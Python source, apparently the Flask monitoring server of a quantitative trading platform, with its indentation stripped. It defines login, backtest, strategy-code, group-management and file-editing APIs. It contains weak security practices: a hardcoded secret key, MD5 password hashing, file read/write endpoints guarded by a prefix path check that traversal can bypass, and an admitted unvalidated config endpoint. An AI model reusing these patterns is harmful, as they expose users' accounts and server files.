blocksize = 10240
dat_file = open(filename, 'r', encoding=encoding)
last_line = ""
if filesize > blocksize :
maxseekpoint = (filesize // blocksize)
dat_file.seek((maxseekpoint-1)*blocksize)
elif filesize :
dat_file.seek(0, 0)
lines = dat_file.readlines()
if lines :
last_line = lines[-N:]
dat_file.close()
return ''.join(last_line), len(last_line)
def check_auth():
usrInfo = session.get("userinfo")
# session里没有用户信息
if usrInfo is None:
return False, {
"result":-999,
"message":"请先登录"
}
# session里有用户信息,则要读取
exptime = session.get("expiretime")
now = datetime.datetime.now().replace(tzinfo=pytz.timezone('UTC')).strftime("%Y.%m.%d %H:%M:%S")
if now > exptime:
return False, {
"result":-999,
"message":"登录已超时,请重新登录"
}
return True, usrInfo
def get_cfg_tree(root:str, name:str):
if not os.path.exists(root):
return {
"label":name,
"path":root,
"exist":False,
"isfile":False,
"children":[]
}
if os.path.isfile(root):
return {
"label":name,
"path":root,
"exist":False,
"isfile":True
}
ret = {
"label":name,
"path":root,
"exist":True,
"isfile":False,
"children":[]
}
filepath = os.path.join(root, "run.py")
ret['children'].append({
"label":"run.py",
"path":filepath,
"exist":True,
"isfile":True,
"children":[]
})
filepath = os.path.join(root, "config.json")
isYaml = False
if not os.path.exists(filepath):
filepath = os.path.join(root, "config.yaml")
isYaml = True
ret['children'].append({
"label":"config.yaml" if isYaml else "config.json",
"path":filepath,
"exist":True,
"isfile":True,
"children":[]
})
f = open(filepath, "r")
content = f.read()
f.close()
# 加一段编码检查的逻辑
encoding = chardet.detect(content[:500])["encoding"]
content = content.decode(encoding)
if isYaml:
cfgObj = yaml.full_load(content)
else:
cfgObj = json.loads(content)
if "executers" in cfgObj:
filename = cfgObj["executers"]
if type(filename) == str:
filepath = os.path.join(root, filename)
ret['children'].append({
"label":filename,
"path":filepath,
"exist":True,
"isfile":True,
"children":[]
})
if "parsers" in cfgObj:
filename = cfgObj["parsers"]
if type(filename) == str:
filepath = os.path.join(root, filename)
ret['children'].append({
"label":filename,
"path":filepath,
"exist":True,
"isfile":True,
"children":[]
})
if "traders" in cfgObj:
filename = cfgObj["traders"]
if type(filename) == str:
filepath = os.path.join(root, filename)
ret['children'].append({
"label":filename,
"path":filepath,
"exist":True,
"isfile":True,
"children":[]
})
filepath = os.path.join(root, 'generated')
ret["children"].append(get_path_tree(filepath, 'generated', True))
return ret
def get_path_tree(root:str, name:str, hasFile:bool = True):
if not os.path.exists(root):
return {
"label":name,
"path":root,
"exist":False,
"isfile":False,
"children":[]
}
if os.path.isfile(root):
return {
"label":name,
"path":root,
"exist":False,
"isfile":True
}
ret = {
"label":name,
"path":root,
"exist":True,
"isfile":False,
"children":[]
}
files = os.listdir(root, )
for filename in files:
if filename in ['__pycache__', '.vscode', 'wtpy', '__init__.py']:
continue
if filename[-3:] == 'pyc':
continue
filepath = os.path.join(root, filename)
if os.path.isfile(filepath):
if not hasFile:
continue
else:
ret["children"].append({
"label":filename,
"path":filepath,
"exist":True,
"isfile":True})
else:
ret["children"].append(get_path_tree(filepath, filename, hasFile))
ay1 = list()
ay2 = list()
for item in ret["children"]:
if item["isfile"]:
ay2.append(item)
else:
ay1.append(item)
ay = ay1 + ay2
ret["children"] = ay
return ret
class WtMonSink:
def __init__(self):
return
def notify(self, level:str, msg:str):
return
class WtMonSvr(WatcherSink):
def __init__(self, static_folder:str="", static_url_path="/", deploy_dir="C:/", sink:WtMonSink = None):
'''
WtMonSvr构造函数
@static_folder 静态文件根目录
@static_url_path 静态文件访问路径
@deploy_dir 实盘部署目录
'''
if len(static_folder) == 0:
static_folder = 'static'
self.logger = WtLogger(__name__, "WtMonSvr.log")
self._sink_ = sink
# 数据管理器,主要用于缓存各组合的数据
self.__data_mgr__ = DataMgr('data.db', logger=self.logger)
self.__bt_mon__:WtBtMon = None
self.__dt_servo__:WtDtServo = None
# 看门狗模块,主要用于调度各个组合启动关闭
self._dog = WatchDog(sink=self, db=self.__data_mgr__.get_db(), logger=self.logger)
app = Flask(__name__, instance_relative_config=True, static_folder=static_folder, static_url_path=static_url_path)
app.secret_key = "!@#$%^&*()"
Compress(app)
# app.debug = True
self.app = app
self.worker = None
self.deploy_dir = deploy_dir
self.deploy_tree = None
self.push_svr = PushServer(app, self.__data_mgr__, self.logger)
self.init_mgr_apis(app)
def set_bt_mon(self, btMon:WtBtMon):
'''
设置回测管理器
@btMon 回测管理器WtBtMon实例
'''
self.__bt_mon__ = btMon
self.init_bt_apis(self.app)
def set_dt_servo(self, dtServo:WtDtServo):
'''
设置DtServo
@dtServo 本地数据伺服WtDtServo实例
'''
self.__dt_servo__ = dtServo
def init_bt_apis(self, app:Flask):
# 拉取K线数据
@app.route("/bt/qrybars", methods=["POST"])
def qry_bt_bars():
bSucc, json_data = parse_data()
if not bSucc:
return pack_rsp(json_data)
bSucc, userInfo = check_auth()
if not bSucc:
return pack_rsp(userInfo)
user = userInfo["loginid"]
role = userInfo["role"]
if role not in ['researcher','superman']:
ret = {
"result":-1,
"message":"没有权限"
}
return pack_rsp(ret)
if self.__dt_servo__ is None:
ret = {
"result":-2,
"message":"没有配置数据伺服"
}
return pack_rsp(ret)
stdCode = get_param(json_data, "code")
period = get_param(json_data, "period")
fromTime = get_param(json_data, "stime", int, None)
dataCount = get_param(json_data, "count", int, None)
endTime = get_param(json_data, "etime", int)
bars = self.__dt_servo__.get_bars(stdCode=stdCode, period=period, fromTime=fromTime, dataCount=dataCount, endTime=endTime)
if bars is None:
ret = {
"result":-2,
"message":"Data not found"
}
else:
bar_list = [curBar.to_dict for curBar in bars]
ret = {
"result":0,
"message":"Ok",
"bars": bar_list
}
return pack_rsp(ret)
# 拉取用户策略列表
@app.route("/bt/qrystras", methods=["POST"])
def qry_my_stras():
bSucc, json_data = parse_data()
if not bSucc:
return pack_rsp(json_data)
bSucc, userInfo = check_auth()
if not bSucc:
return pack_rsp(userInfo)
user = userInfo["loginid"]
role = userInfo["role"]
if role not in ['researcher','superman']:
ret = {
"result":-1,
"message":"没有权限"
}
return pack_rsp(ret)
ret = {
"result":0,
"message":"OK",
"strategies": self.__bt_mon__.get_strategies(user)
}
return pack_rsp(ret)
# 拉取策略代码
@app.route("/bt/qrycode", methods=["POST"])
def qry_stra_code():
bSucc, json_data = parse_data()
if not bSucc:
return pack_rsp(json_data)
bSucc, userInfo = check_auth()
if not bSucc:
return pack_rsp(userInfo)
user = userInfo["loginid"]
role = userInfo["role"]
if role not in ['researcher','superman']:
ret = {
"result":-1,
"message":"没有权限"
}
return pack_rsp(ret)
straid = get_param(json_data, "straid")
if self.__bt_mon__ is None:
ret = {
"result":-1,
"message":"回测管理器未配置"
}
else:
if not self.__bt_mon__.has_strategy(user, straid):
ret = {
"result":-2,
"message":"策略代码不存在"
}
else:
content = self.__bt_mon__.get_strategy_code(user, straid)
ret = {
"result":0,
"message":"OK",
"content":content
}
return pack_rsp(ret)
# 提交策略代码
@app.route("/bt/setcode", methods=["POST"])
def set_stra_code():
bSucc, json_data = parse_data()
if not bSucc:
return pack_rsp(json_data)
bSucc, userInfo = check_auth()
if not bSucc:
return pack_rsp(userInfo)
user = userInfo["loginid"]
role = userInfo["role"]
if role not in ['researcher','superman']:
ret = {
"result":-1,
"message":"没有权限"
}
return pack_rsp(ret)
straid = get_param(json_data, "straid")
content = get_param(json_data, "content")
if len(content) == 0 or len(straid) == 0:
ret = {
"result":-2,
"message":"策略ID和代码不能为空"
}
return pack_rsp(ret)
if self.__bt_mon__ is None:
ret = {
"result":-1,
"message":"回测管理器未配置"
}
else:
if not self.__bt_mon__.has_strategy(user, straid):
ret = {
"result":-2,
"message":"策略不存在"
}
else:
ret = self.__bt_mon__.set_strategy_code(user, straid, content)
if ret:
ret = {
"result":0,
"message":"OK"
}
else:
ret = {
"result":-3,
"message":"保存策略代码失败"
}
return pack_rsp(ret)
# 添加用户策略
@app.route("/bt/addstra", methods=["POST"])
def cmd_add_stra():
bSucc, json_data = parse_data()
if not bSucc:
return pack_rsp(json_data)
bSucc, userInfo = check_auth()
if not bSucc:
return pack_rsp(userInfo)
user = userInfo["loginid"]
role = userInfo["role"]
if role not in ['researcher','superman']:
ret = {
"result":-1,
"message":"没有权限"
}
return pack_rsp(ret)
name = get_param(json_data, "name")
if len(name) == 0:
ret = {
"result":-2,
"message":"策略名称不能为空"
}
return pack_rsp(ret)
if self.__bt_mon__ is None:
ret = {
"result":-3,
"message":"回测管理器未配置"
}
return pack_rsp(ret)
straInfo = self.__bt_mon__.add_strategy(user, name)
if straInfo is None:
ret = {
"result":-4,
"message":"策略添加失败"
}
else:
ret = {
"result":0,
"message":"OK",
"strategy": straInfo
}
return pack_rsp(ret)
# 删除用户策略
@app.route("/bt/delstra", methods=["POST"])
def cmd_del_stra():
bSucc, json_data = parse_data()
if not bSucc:
return pack_rsp(json_data)
bSucc, userInfo = check_auth()
if not bSucc:
return pack_rsp(userInfo)
user = userInfo["loginid"]
role = userInfo["role"]
if role not in ['researcher','superman']:
ret = {
"result":-1,
"message":"没有权限"
}
return pack_rsp(ret)
straid = get_param(json_data, "straid")
if len(straid) == 0:
ret = {
"result":-2,
"message":"策略ID不能为空"
}
return pack_rsp(ret)
if self.__bt_mon__ is None:
ret = {
"result":-1,
"message":"回测管理器未配置"
}
else:
if not self.__bt_mon__.has_strategy(user, straid):
ret = {
"result":-2,
"message":"策略不存在"
}
else:
ret = self.__bt_mon__.del_strategy(user, straid)
if ret:
ret = {
"result":0,
"message":"OK"
}
else:
ret = {
"result":-3,
"message":"保存策略代码失败"
}
return pack_rsp(ret)
# 获取策略回测列表
@app.route("/bt/qrystrabts", methods=["POST"])
def qry_stra_bts():
bSucc, json_data = parse_data()
if not bSucc:
return pack_rsp(json_data)
bSucc, userInfo = check_auth()
if not bSucc:
return pack_rsp(userInfo)
user = userInfo["loginid"]
role = userInfo["role"]
if role not in ['researcher','superman']:
ret = {
"result":-1,
"message":"没有权限"
}
return pack_rsp(ret)
straid = get_param(json_data, "straid")
if len(straid) == 0:
ret = {
"result":-2,
"message":"策略ID不能为空"
}
return pack_rsp(ret)
if self.__bt_mon__ is None:
ret = {
"result":-1,
"message":"回测管理器未配置"
}
else:
if not self.__bt_mon__.has_strategy(user, straid):
ret = {
"result":-2,
"message":"策略不存在"
}
else:
ret = {
"result":0,
"message":"OK",
"backtests":self.__bt_mon__.get_backtests(user, straid)
}
return pack_rsp(ret)
# 获取策略回测信号
@app.route("/bt/qrybtsigs", methods=["POST"])
def qry_stra_bt_signals():
bSucc, json_data = parse_data()
if not bSucc:
return pack_rsp(json_data)
bSucc, userInfo = check_auth()
if not bSucc:
return pack_rsp(userInfo)
user = userInfo["loginid"]
role = userInfo["role"]
if role not in ['researcher','superman']:
ret = {
"result":-1,
"message":"没有权限"
}
return pack_rsp(ret)
straid = get_param(json_data, "straid")
btid = get_param(json_data, "btid")
if len(straid) == 0 or len(btid) == 0:
ret = {
"result":-2,
"message":"策略ID和回测ID不能为空"
}
return pack_rsp(ret)
if self.__bt_mon__ is None:
ret = {
"result":-1,
"message":"回测管理器未配置"
}
else:
if not self.__bt_mon__.has_strategy(user, straid):
ret = {
"result":-2,
"message":"策略不存在"
}
else:
ret = {
"result":0,
"message":"OK",
"signals":self.__bt_mon__.get_bt_signals(user, straid, btid)
}
return pack_rsp(ret)
# 删除策略回测列表
@app.route("/bt/delstrabt", methods=["POST"])
def cmd_del_stra_bt():
bSucc, json_data = parse_data()
if not bSucc:
return pack_rsp(json_data)
bSucc, userInfo = check_auth()
if not bSucc:
return pack_rsp(userInfo)
user = userInfo["loginid"]
role = userInfo["role"]
if role not in ['researcher','superman']:
ret = {
"result":-1,
"message":"没有权限"
}
return pack_rsp(ret)
btid = get_param(json_data, "btid")
if len(btid) == 0:
ret = {
"result":-2,
"message":"回测ID不能为空"
}
return pack_rsp(ret)
if self.__bt_mon__ is None:
ret = {
"result":-1,
"message":"回测管理器未配置"
}
else:
self.__bt_mon__.del_backtest(user, btid)
ret = {
"result":0,
"message":"OK"
}
return pack_rsp(ret)
# 获取策略回测成交
@app.route("/bt/qrybttrds", methods=["POST"])
def qry_stra_bt_trades():
bSucc, json_data = parse_data()
if not bSucc:
return pack_rsp(json_data)
bSucc, userInfo = check_auth()
if not bSucc:
return pack_rsp(userInfo)
user = userInfo["loginid"]
role = userInfo["role"]
if role not in ['researcher','superman']:
ret = {
"result":-1,
"message":"没有权限"
}
return pack_rsp(ret)
straid = get_param(json_data, "straid")
btid = get_param(json_data, "btid")
if len(straid) == 0 or len(btid) == 0:
ret = {
"result":-2,
"message":"策略ID和回测ID不能为空"
}
return pack_rsp(ret)
if self.__bt_mon__ is None:
ret = {
"result":-1,
"message":"回测管理器未配置"
}
else:
if not self.__bt_mon__.has_strategy(user, straid):
ret = {
"result":-2,
"message":"策略不存在"
}
else:
ret = {
"result":0,
"message":"OK",
"trades":self.__bt_mon__.get_bt_trades(user, straid, btid)
}
return pack_rsp(ret)
# 获取策略回测资金
@app.route("/bt/qrybtfunds", methods=["POST"])
def qry_stra_bt_funds():
bSucc, json_data = parse_data()
if not bSucc:
return pack_rsp(json_data)
bSucc, userInfo = check_auth()
if not bSucc:
return pack_rsp(userInfo)
user = userInfo["loginid"]
role = userInfo["role"]
if role not in ['researcher','superman']:
ret = {
"result":-1,
"message":"没有权限"
}
return pack_rsp(ret)
straid = get_param(json_data, "straid")
btid = get_param(json_data, "btid")
if len(straid) == 0 or len(btid) == 0:
ret = {
"result":-2,
"message":"策略ID和回测ID不能为空"
}
return pack_rsp(ret)
if self.__bt_mon__ is None:
ret = {
"result":-1,
"message":"回测管理器未配置"
}
else:
if not self.__bt_mon__.has_strategy(user, straid):
ret = {
"result":-2,
"message":"策略不存在"
}
else:
ret = {
"result":0,
"message":"OK",
"funds":self.__bt_mon__.get_bt_funds(user, straid, btid)
}
return pack_rsp(ret)
# 获取策略回测回合
@app.route("/bt/qrybtrnds", methods=["POST"])
def qry_stra_bt_rounds():
bSucc, json_data = parse_data()
if not bSucc:
return pack_rsp(json_data)
bSucc, userInfo = check_auth()
if not bSucc:
return pack_rsp(userInfo)
user = userInfo["loginid"]
role = userInfo["role"]
if role not in ['researcher','superman']:
ret = {
"result":-1,
"message":"没有权限"
}
return pack_rsp(ret)
straid = get_param(json_data, "straid")
btid = get_param(json_data, "btid")
if len(straid) == 0 or len(btid) == 0:
ret = {
"result":-2,
"message":"策略ID和回测ID不能为空"
}
return pack_rsp(ret)
if self.__bt_mon__ is None:
ret = {
"result":-1,
"message":"回测管理器未配置"
}
else:
if not self.__bt_mon__.has_strategy(user, straid):
ret = {
"result":-2,
"message":"策略不存在"
}
else:
ret = {
"result":0,
"message":"OK",
"rounds":self.__bt_mon__.get_bt_rounds(user, straid, btid)
}
return pack_rsp(ret)
# 启动策略回测
@app.route("/bt/runstrabt", methods=["POST"])
def cmd_run_stra_bt():
bSucc, json_data = parse_data()
if not bSucc:
return pack_rsp(json_data)
bSucc, userInfo = check_auth()
if not bSucc:
return pack_rsp(userInfo)
user = userInfo["loginid"]
role = userInfo["role"]
if role not in ['researcher','superman']:
ret = {
"result":-1,
"message":"没有权限"
}
return pack_rsp(ret)
curDt = int(datetime.datetime.now().strftime("%Y%m%d"))
straid = get_param(json_data, "straid")
fromtime = get_param(json_data, "stime", int, defVal=curDt)
endtime = get_param(json_data, "etime", int, defVal=curDt)
capital = get_param(json_data, "capital", float, defVal=500000)
slippage = get_param(json_data, "slippage", int, defVal=0)
if len(straid) == 0:
ret = {
"result":-2,
"message":"策略ID不能为空"
}
return pack_rsp(ret)
if fromtime > endtime:
fromtime,endtime = endtime,fromtime
fromtime = fromtime*10000 + 900
endtime = endtime*10000 + 1515
if self.__bt_mon__ is None:
ret = {
"result":-1,
"message":"回测管理器未配置"
}
else:
if not self.__bt_mon__.has_strategy(user, straid):
ret = {
"result":-2,
"message":"策略不存在"
}
else:
btInfo = self.__bt_mon__.run_backtest(user,straid,fromtime,endtime,capital,slippage)
ret = {
"result":0,
"message":"OK",
"backtest": btInfo
}
return pack_rsp(ret)
def init_mgr_apis(self, app:Flask):
@app.route("/console", methods=["GET"])
def stc_console_index():
return redirect("./console/index.html")
@app.route("/mobile", methods=["GET"])
def stc_mobile_index():
return redirect("./mobile/index.html")
'''下面是API接口的编写'''
@app.route("/mgr/login", methods=["POST"])
def cmd_login():
bSucc, json_data = parse_data()
if not bSucc:
return pack_rsp(json_data)
if True:
user = get_param(json_data, "loginid")
pwd = get_param(json_data, "passwd")
if len(user) == 0 or len(pwd) == 0:
ret = {
"result":-1,
"message":"用户名和密码不能为空"
}
else:
encpwd = hashlib.md5((user+pwd).encode("utf-8")).hexdigest()
now = datetime.datetime.now()
usrInf = self.__data_mgr__.get_user(user)
if usrInf is None:
ret = {
"result":-1,
"message":"用户不存在"
}
elif encpwd != usrInf["passwd"]:
ret = {
"result":-1,
"message":"登录密码错误"
}
else:
usrInf.pop("passwd")
usrInf["loginip"]=request.remote_addr
usrInf["logintime"]=now.strftime("%Y/%m/%d %H:%M:%S")
exptime = now + datetime.timedelta(minutes=360) #360分钟令牌超时
session["userinfo"] = usrInf
session["expiretime"] = exptime.replace(tzinfo=pytz.timezone('UTC')).strftime("%Y.%m.%d %H:%M:%S")
ret = {
"result":0,
"message":"Ok",
"userinfo":usrInf
}
self.__data_mgr__.log_action(usrInf, "login", json.dumps(request.headers.get('User-Agent')))
else:
ret = {
"result":-1,
"message":"请求处理出现异常",
}
if session.get("userinfo") is not None:
session.pop("userinfo")
return pack_rsp(ret)
# 修改密码
@app.route("/mgr/modpwd", methods=["POST"])
def mod_pwd():
bSucc, json_data = parse_data()
if not bSucc:
return pack_rsp(json_data)
bSucc, adminInfo = check_auth()
if not bSucc:
return pack_rsp(adminInfo)
oldpwd = get_param(json_data, "oldpwd")
newpwd = get_param(json_data, "newpwd")
if len(oldpwd) == 0 or len(newpwd) == 0:
ret = {
"result":-1,
"message":"新旧密码都不能为空"
}
else:
user = adminInfo["loginid"]
oldencpwd = hashlib.md5((user+oldpwd).encode("utf-8")).hexdigest()
usrInf = self.__data_mgr__.get_user(user)
if usrInf is None:
ret = {
"result":-1,
"message":"用户不存在"
}
else:
if oldencpwd != usrInf["passwd"]:
ret = {
"result":-1,
"message":"旧密码错误"
}
else:
if 'builtin' in usrInf and usrInf["builtin"]:
#如果是内建账号要改密码,则先添加用户
usrInf["passwd"] = oldpwd
self.__data_mgr__.add_user(usrInf, user)
print("%s是内建账户,自动添加到数据库中" % user)
newencpwd = hashlib.md5((user+newpwd).encode("utf-8")).hexdigest()
self.__data_mgr__.mod_user_pwd(user, newencpwd, user)
ret = {
"result":0,
"message":"Ok"
}
return pack_rsp(ret)
# 添加组合
@app.route("/mgr/addgrp", methods=["POST"])
def cmd_add_group():
bSucc, json_data = parse_data()
if not bSucc:
return pack_rsp(json_data)
bSucc, adminInfo = check_auth()
if not bSucc:
return pack_rsp(adminInfo)
id = get_param(json_data, "groupid")
name = get_param(json_data, "name")
path = get_param(json_data, "path")
info = get_param(json_data, "info")
gtype = get_param(json_data, "gtype")
env = get_param(json_data, "env")
datmod = get_param(json_data, "datmod")
mqurl = get_param(json_data, "mqurl")
action = get_param(json_data, "action")
if action == "":
action = "add"
if len(id) == 0 or len(name) == 0 or len(gtype) == 0:
ret = {
"result":-1,
"message":"组合ID、名称、类型都不能为空"
}
elif not os.path.exists(path) or not os.path.isdir(path):
ret = {
"result":-2,
"message":"组合运行目录不正确"
}
elif action == "add" and self.__data_mgr__.has_group(id):
ret = {
"result":-3,
"message":"组合ID不能重复"
}
else:
try:
grpInfo = {
"id":id,
"name":name,
"path":path,
"info":info,
"gtype":gtype,
"datmod":datmod,
"env":env,
"mqurl":mqurl
}
if self.__data_mgr__.add_group(grpInfo):
ret = {
"result":0,
"message":"Ok"
}
if action == "add":
self.__data_mgr__.log_action(adminInfo, "addgrp", json.dumps(grpInfo))
else:
self.__data_mgr__.log_action(adminInfo, "modgrp", json.dumps(grpInfo))
self._dog.updateMQURL(id, mqurl)
else:
ret = {
"result":-2,
"message":"添加用户失败"
}
except:
ret = {
"result":-1,
"message":"请求解析失败"
}
return pack_rsp(ret)
# 删除组合
@app.route("/mgr/delgrp", methods=["POST"])
def cmd_del_group():
bSucc, json_data = parse_data()
if not bSucc:
return pack_rsp(json_data)
bSucc, adminInfo = check_auth()
if not bSucc:
return pack_rsp(adminInfo)
id = get_param(json_data, "groupid")
if len(id) == 0:
ret = {
"result":-1,
"message":"组合ID不能为空"
}
elif not self.__data_mgr__.has_group(id):
ret = {
"result":-3,
"message":"该组合不存在"
}
elif self._dog.isRunning(id):
ret = {
"result":-3,
"message":"请先停止该组合"
}
else:
if True:
self._dog.delApp(id)
self.__data_mgr__.del_group(id)
ret = {
"result":0,
"message":"Ok"
}
self.__data_mgr__.log_action(adminInfo, "delgrp", id)
else:
ret = {
"result":-1,
"message":"请求解析失败"
}
return pack_rsp(ret)
# 组合停止
@app.route("/mgr/stopgrp", methods=["POST"])
def cmd_stop_group():
bSucc, json_data = parse_data()
if not bSucc:
return pack_rsp(json_data)
bSucc, adminInfo = check_auth()
if not bSucc:
return pack_rsp(adminInfo)
grpid = get_param(json_data, "groupid")
if not self.__data_mgr__.has_group(grpid):
ret = {
"result":-1,
"message":"组合不存在"
}
else:
if self._dog.isRunning(grpid):
self._dog.stop(grpid)
ret = {
"result":0,
"message":"Ok"
}
self.__data_mgr__.log_action(adminInfo, "stopgrp", grpid)
return pack_rsp(ret)
# 组合启动
@app.route("/mgr/startgrp", methods=["POST"])
def cmd_start_group():
bSucc, json_data = parse_data()
if not bSucc:
return pack_rsp(json_data)
bSucc, adminInfo = check_auth()
if not bSucc:
return pack_rsp(adminInfo)
grpid = get_param(json_data, "groupid")
if not self.__data_mgr__.has_group(grpid):
ret = {
"result":-1,
"message":"组合不存在"
}
else:
if not self._dog.isRunning(grpid):
self._dog.start(grpid)
ret = {
"result":0,
"message":"Ok"
}
self.__data_mgr__.log_action(adminInfo, "startgrp", grpid)
return pack_rsp(ret)
# 获取执行的python进程的路径
@app.route("/mgr/qryexec", methods=["POST"])
def qry_exec_path():
bSucc, json_data = parse_data()
if not bSucc:
return pack_rsp(json_data)
bSucc, adminInfo = check_auth()
if not bSucc:
return pack_rsp(adminInfo)
ret = {
"result":0,
"message":"Ok",
"path": sys.executable
}
return pack_rsp(ret)
# 配置监控
@app.route("/mgr/qrymon", methods=["POST"])
def qry_mon_cfg():
bSucc, json_data = parse_data()
if not bSucc:
return pack_rsp(json_data)
bSucc, adminInfo = check_auth()
if not bSucc:
return pack_rsp(adminInfo)
grpid = get_param(json_data, "groupid")
if not self.__data_mgr__.has_group(grpid):
ret = {
"result":-1,
"message":"组合不存在"
}
else:
monCfg = self._dog.getAppConf(grpid)
if monCfg is None:
ret = {
"result":0,
"message":"ok"
}
else:
ret = {
"result":0,
"message":"ok",
"config":monCfg
}
return pack_rsp(ret)
# 配置监控
@app.route("/mgr/cfgmon", methods=["POST"])
def cmd_config_monitor():
bSucc, json_data = parse_data()
if not bSucc:
return pack_rsp(json_data)
bSucc, adminInfo = check_auth()
if not bSucc:
return pack_rsp(adminInfo)
#这里本来是要做检查的,算了,先省事吧
isGrp = get_param(json_data, "group", bool, False)
self._dog.applyAppConf(json_data, isGrp)
ret = {
"result":0,
"message":"ok"
}
self.__data_mgr__.log_action(adminInfo, "cfgmon", json.dumps(json_data))
return pack_rsp(ret)
# 查询目录结构
@app.route("/mgr/qrydir", methods=["POST"])
def qry_directories():
bSucc, json_data = parse_data()
if not bSucc:
return pack_rsp(json_data)
bSucc, usrInfo = check_auth()
if not bSucc:
return pack_rsp(usrInfo)
if True:
if self.deploy_tree is None:
self.deploy_tree = get_path_tree(self.deploy_dir, "root")
ret = {
"result":0,
"message":"Ok",
"tree":self.deploy_tree
}
else:
ret = {
"result":-1,
"message":"请求解析失败"
}
return pack_rsp(ret)
# 查询目录结构
@app.route("/mgr/qrygrpdir", methods=["POST"])
def qry_grp_directories():
bSucc, json_data = parse_data()
if not bSucc:
return pack_rsp(json_data)
bSucc, usrInfo = check_auth()
if not bSucc:
return pack_rsp(usrInfo)
grpid = get_param(json_data, "groupid")
if not self.__data_mgr__.has_group(grpid):
ret = {
"result":-1,
"message":"组合不存在"
}
else:
monCfg = self.__data_mgr__.get_group(grpid)
ret = {
"result":0,
"message":"Ok",
"tree": get_cfg_tree(monCfg["path"], "root")
}
return pack_rsp(ret)
# 查询组合列表
@app.route("/mgr/qrygrp", methods=["POST"])
def qry_groups():
bSucc, json_data = parse_data()
if not bSucc:
return pack_rsp(json_data)
bSucc, usrInfo = check_auth()
if not bSucc:
return pack_rsp(usrInfo)
try:
groups = self.__data_mgr__.get_groups()
for grpInfo in groups:
grpInfo["running"] = self._dog.isRunning(grpInfo["id"])
ret = {
"result":0,
"message":"Ok",
"groups":groups
}
except:
ret = {
"result":-1,
"message":"请求解析失败"
}
return pack_rsp(ret)
# 查询文件信息
@app.route("/mgr/qrygrpfile", methods=["POST"])
def qry_group_file():
bSucc, json_data = parse_data()
if not bSucc:
return pack_rsp(json_data)
bSucc, usrInfo = check_auth()
if not bSucc:
return pack_rsp(usrInfo)
grpid = get_param(json_data, "groupid")
path = get_param(json_data, "path")
if not self.__data_mgr__.has_group(grpid):
ret = {
"result":-1,
"message":"组合不存在"
}
else:
monCfg = self.__data_mgr__.get_group(grpid)
root = monCfg["path"]
if path[:len(root)] != root:
ret = {
"result":-1,
"message":"目标文件不在当前组合下"
}
else:
f = open(path,'rb')
content = f.read()
f.close()
encoding = chardet.detect(content)["encoding"]
content = content.decode(encoding)
ret = {
"result":0,
"message":"Ok",
"content": content
}
return pack_rsp(ret)
# 提交组合文件
@app.route("/mgr/cmtgrpfile", methods=["POST"])
def cmd_commit_group_file():
bSucc, json_data = parse_data()
if not bSucc:
return pack_rsp(json_data)
bSucc, usrInfo = check_auth()
if not bSucc:
return pack_rsp(usrInfo)
grpid = get_param(json_data, "groupid")
content = get_param(json_data, "content")
path = get_param(json_data, "path")
if not self.__data_mgr__.has_group(grpid):
ret = {
"result":-1,
"message":"组合不存在"
}
else:
monCfg = self.__data_mgr__.get_group(grpid)
root = monCfg["path"]
if path[:len(root)] != root:
ret = {
"result":-1,
"message":"目标文件不在当前组合下"
}
else:
try:
f = open(path,'rb')
old_content = f.read()
f.close()
encoding = chardet.detect(old_content)["encoding"]
backup_file(path)
f = open(path,'wb')
f.write(content.encode(encoding))
f.close()
ret = {
"result":0,
"message":"Ok"
}
except:
ret = {
"result":-1,
"message":"文件保存失败"
}
return pack_rsp(ret)
# 查询策略列表
@app.route("/mgr/qrystras", methods=["POST"])
def qry_strategys():
bSucc, json_data = parse_data()
if not bSucc:
return pack_rsp(json_data)
bSucc, usrInfo = check_auth()
if not bSucc:
return pack_rsp(usrInfo)
grpid = get_param(json_data, "groupid")
if not self.__data_mgr__.has_group(grpid):
ret = {
"result":-1,
"message":"组合不存在"
}
else:
ret = {
"result":0,
"message":"Ok",
"strategies":self.__data_mgr__.get_strategies(grpid)
}
return pack_rsp(ret)
# 查询通道列表
@app.route("/mgr/qrychnls", methods=["POST"])
def qry_channels():
bSucc, json_data = parse_data()
if not bSucc:
return pack_rsp(json_data)
bSucc, usrInfo = check_auth()
if not bSucc:
return pack_rsp(usrInfo)
grpid = get_param(json_data, "groupid")
if not self.__data_mgr__.has_group(grpid):
ret = {
"result":-1,
"message":"组合不存在"
}
else:
ret = {
"result":0,
"message":"Ok",
"channels":self.__data_mgr__.get_channels(grpid)
}
return pack_rsp(ret)
# 查询组合日志
@app.route("/mgr/qrylogs", methods=["POST"])
def qry_logs():
bSucc, json_data = parse_data()
if not bSucc:
return pack_rsp(json_data)
bSucc, usrInfo = check_auth()
if not bSucc:
return pack_rsp(usrInfo)
grpid = get_param(json_data, "id")
logtype = get_param(json_data, "type")
if not self.__data_mgr__.has_group(grpid):
ret = {
"result":-1,
"message":"组合不存在"
}
else:
grpInfo = self.__data_mgr__.get_group(grpid)
try:
logfolder = os.path.join(grpInfo["path"], "./Logs/")
file_list = os.listdir(logfolder)
targets = list()
for fname in file_list:
if fname[:6] == "Runner":
targets.append(fname)
targets.sort()
filename = os.path.join(logfolder, targets[-1])
content,lines = get_tail(filename, 100)
ret = {
"result":0,
"message":"Ok",
"content":content,
"lines":lines
}
except:
ret = {
"result":-1,
"message":"请求解析失败"
}
return pack_rsp(ret)
# 查询策略成交
@app.route("/mgr/qrytrds", methods=["POST"])
def qry_trades():
bSucc, json_data = parse_data()
if not bSucc:
return pack_rsp(json_data)
bSucc, usrInfo = check_auth()
if not bSucc:
return pack_rsp(usrInfo)
gid = get_param(json_data, "groupid")
sid = get_param(json_data, "strategyid")
if not self.__data_mgr__.has_group(gid):
ret = {
"result":-1,
"message":"组合不存在"
}
else:
ret = {
"result":0,
"message":"",
"trades": self.__data_mgr__.get_trades(gid, sid)
}
return pack_rsp(ret)
# 查询策略信号
@app.route("/mgr/qrysigs", methods=["POST"])
def qry_signals():
bSucc, json_data = parse_data()
if not bSucc:
return pack_rsp(json_data)
bSucc, usrInfo = check_auth()
if not bSucc:
return pack_rsp(usrInfo)
gid = get_param(json_data, "groupid")
sid = get_param(json_data, "strategyid")
if not self.__data_mgr__.has_group(gid):
ret = {
"result":-1,
"message":"组合不存在"
}
else:
ret = {
"result":0,
"message":"",
"signals": self.__data_mgr__.get_signals(gid, sid)
}
return pack_rsp(ret)
# 查询策略回合
@app.route("/mgr/qryrnds", methods=["POST"])
def qry_rounds():
bSucc, json_data = parse_data()
if not bSucc:
return pack_rsp(json_data)
bSucc, usrInfo = check_auth()
if not bSucc:
return pack_rsp(usrInfo)
gid = get_param(json_data, "groupid")
sid = get_param(json_data, "strategyid")
